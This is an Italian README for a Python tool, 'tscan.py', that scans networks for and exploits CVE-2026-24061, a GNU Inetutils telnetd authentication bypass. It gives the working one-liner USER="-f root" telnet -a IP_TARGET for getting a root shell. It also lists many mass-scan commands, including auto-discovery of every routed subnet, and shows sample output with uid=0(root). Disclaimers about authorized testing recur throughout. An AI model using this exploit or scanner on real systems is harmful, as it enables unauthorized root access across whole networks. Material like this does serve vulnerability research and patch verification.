
Scanner basato su Python che rileva e sfrutta il bypass dell'autenticazione telnetd di CVE-2026-24061, consentendo l'accesso a una shell root sui servizi GNU Inetutils vulnerabili.
Uno scanner basato su Python per rilevare e sfruttare la vulnerabilità CVE-2026-24061 nei servizi telnetd di GNU Inetutils. Questo strumento esegue la scansione di indirizzi IP o reti alla ricerca di servizi telnetd vulnerabili che consentono il bypass dell'autenticazione con accesso a una shell di root.
QUESTO SOFTWARE È FORNITO ESCLUSIVAMENTE PER SCOPI EDUCATIVI E DI TEST DI SICUREZZA AUTORIZZATI.
Questa applicazione è stata sviluppata esclusivamente per scopi educativi per dimostrare vulnerabilità di sicurezza e per assistere in test di sicurezza e ricerche autorizzate.
QUESTO SOFTWARE È FORNITO "COSÌ COM'È", SENZA ALCUNA GARANZIA, ESPRESSA O IMPLICITA, INCLUSI, A TITOLO ESEMPLIFICATIVO, LE GARANZIE DI COMMERCIABILITÀ, IDONEITÀ PER UNO SCOPO PARTICOLARE E NON VIOLAZIONE. GLI AUTORI E I COLLABORATORI NON GARANTISCONO CHE IL SOFTWARE SIA PRIVO DI ERRORI, SICURO O FUNZIONANTE. Il software può contenere bug, errori o altri difetti.
TUTTA LA RESPONSABILITÀ E LA RILEVANZA GIURIDICA PER L'USO DI QUESTO SOFTWARE RICADE INTERAMENTE SULL'UTENTE. Gli autori, i collaboratori e i distributori di questo software non saranno ritenuti responsabili per eventuali danni, perdite o conseguenze legali derivanti dall'uso, dall'abuso o dall'incapacità di utilizzare questo software.
Questo strumento deve essere utilizzato SOLO su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta a testare. L'accesso non autorizzato a sistemi informatici è illegale e può comportare un'azione penale.
Gli autori NON garantiscono:
Utilizzando questo software, dichiari di aver letto, compreso e accettato di essere vincolato da questi termini. Se non sei d'accordo, non utilizzare questo software.
Sviluppato da: Cuma KURT
Email: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: telnetd di GNU Inetutils fino alla versione 2.7 consente il bypass remoto dell'autenticazione tramite un valore -f root per la variabile d'ambiente USER.
Punteggio CVSS: 9.8 (Critico)
Riferimento: NVD CVE-2026-24061
telnet (solitamente preinstallato su Linux/macOS)pip3 install -r requirements.txt
Nota: La maggior parte delle dipendenze fa parte della libreria standard di Python. Lo strumento funziona immediatamente con Python 3.6+.
# Scansione di un singolo indirizzo IP
python3 tscan.py 192.168.1.1
# Scansione di una rete CIDR
python3 tscan.py 192.168.1.0/24
# Scansione con porta personalizzata
python3 tscan.py -p 2323 192.168.1.1
# Scansione di target da un file
python3 tscan.py targets.txt
# Scansione di più indirizzi IP
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# Scansione di più reti CIDR
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# Aumenta il numero di thread per una scansione più rapida (100 thread)
python3 tscan.py -t 100 192.168.1.0/24
# Aumenta il timeout per reti lente
python3 tscan.py --timeout 10 192.168.1.0/24
# Combina entrambi per scansioni di reti estese
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# Rileva e scansiona automaticamente tutte le sottoreti dalla tabella di routing di sistema
python3 tscan.py --auto
# oppure usa la forma abbreviata:
python3 tscan.py -a
# Rilevamento automatico con porta personalizzata
python3 tscan.py --auto -p 2323
# oppure:
python3 tscan.py -a -p 2323
# Rilevamento automatico con numero elevato di thread
python3 tscan.py --auto -t 200
# oppure:
python3 tscan.py -a -t 200
Nota: La modalità --auto legge la tabella di routing di sistema tramite il comando ip route list o route -n e scansiona automaticamente tutte le sottoreti rilevate.
# Esempio 1: Scansione rapida della rete locale
python3 tscan.py 192.168.1.0/24
# Esempio 2: Scansione veloce con elevata concorrenza
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# Esempio 3: Scansione di una porta telnet non standard
python3 tscan.py -p 2323 192.168.1.0/24
# Esempio 4: Rilevamento automatico e scansione di tutte le sottoreti locali
python3 tscan.py --auto
# oppure:
python3 tscan.py -a
# Esempio 5: Rilevamento automatico con impostazioni personalizzate
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# oppure:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
argomenti posizionali:
targets Indirizzo(i) IP, rete(i) CIDR o percorso(i) di file contenenti i target
opzioni:
-h, --help Mostra questo messaggio di aiuto ed esci
-p, --port PORT Porta telnet da scansionare (predefinita: 23)
-t, --threads THREADS Numero di thread concorrenti (predefinito: 50)
--timeout TIMEOUT Timeout di connessione in secondi (predefinito: 5)
-v, --verbose Output dettagliato
-a, --auto Rileva e scansiona automaticamente tutte le sottoreti dalla tabella di routing di sistema (route -n o ip route list)
Crea un file di testo con un target per riga:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
Le righe che iniziano con # sono trattate come commenti e ignorate.
Lo strumento fornisce:
Avanzamento in Tempo Reale: Mostra i risultati man mano che vengono scoperti
[!] - Host vulnerabile[~] - Porta aperta ma non vulnerabileRapporto di Riepilogo: Include:
[*] Avvio della scansione su 256 target...
[*] Porta: 23, Thread: 50, Timeout: 5s
[*] Avanzamento: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Aperte: 2 | Vulnerabili: 1
[!] 192.168.1.100:23 - VULNERABILE
[*] Avanzamento: [████████████████████████████████████] 100.0% (256/256) | Aperte: 3 | Vulnerabili: 1
[+] Scansione completata: 256/256 target scansionati
======================================================================
Riepilogo dei Risultati della Scansione
======================================================================
Servizi telnet trovati: 3
Host vulnerabili: 1
[!] HOST VULNERABILI:
● 192.168.1.100:23
Output: uid=0(root) gid=0(root) groups=0(root)...
[~] Servizi telnet trovati ma non vulnerabili:
● 192.168.1.101:23
● 192.168.1.102:23
[*] Scansione completata in 12.34 secondi
USER="-f root"telnet -aLa vulnerabilità consente il bypass dell'autenticazione impostando la variabile d'ambiente USER su -f root:
USER="-f root" telnet -a IP_TARGET [PORTA]
Questo induce telnetd a interpretare la variabile USER come un flag, bypassando l'autenticazione e concedendo l'accesso di root.
telnetip route list o route -nInstalla il client telnet:
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# Solitamente preinstallato
--timeout 10Questo strumento è destinato a:
NON utilizzare questo strumento per:
Questo programma è software libero: puoi ridistribuirlo e/o modificarlo secondo i termini della GNU General Public License come pubblicata dalla Free Software Foundation, versione 3 della Licenza, o (a tua scelta) qualsiasi versione successiva.
Questo programma è distribuito nella speranza che possa essere utile, ma SENZA ALCUNA GARANZIA; senza nemmeno la garanzia implicita di COMMERCIABILITÀ o IDONEITÀ PER UNO SCOPO PARTICOLARE. Vedere la GNU General Public License per maggiori dettagli.
Dovresti aver ricevuto una copia della GNU General Public License insieme a questo programma. In caso contrario, vedi https://www.gnu.org/licenses/.
Vedi il file LICENSE per il testo completo della GNU General Public License v3.0.
GLI AUTORI E I COLLABORATORI NON SONO RESPONSABILI PER QUALSIASI USO IMPROPRIO O DANNO CAUSATO DA QUESTO STRUMENTO.
Questo strumento è fornito ESCLUSIVAMENTE PER SCOPI EDUCATIVI E DI TEST DI SICUREZZA AUTORIZZATI.
USALO A TUO RISCHIO. Tutta la responsabilità e la rilevanza giuridica per l'uso di questo software ricade interamente sull'utente. Gli autori non garantiscono l'accuratezza, la sicurezza o la funzionalità di questo software. Il software è fornito "COSÌ COM'È" senza alcuna garanzia di alcun tipo.
Questa applicazione è stata sviluppata esclusivamente per scopi educativi. Utilizzando questo software, dichiari di riconoscere che:
Se non accetti questi termini, NON UTILIZZARE QUESTO SOFTWARE.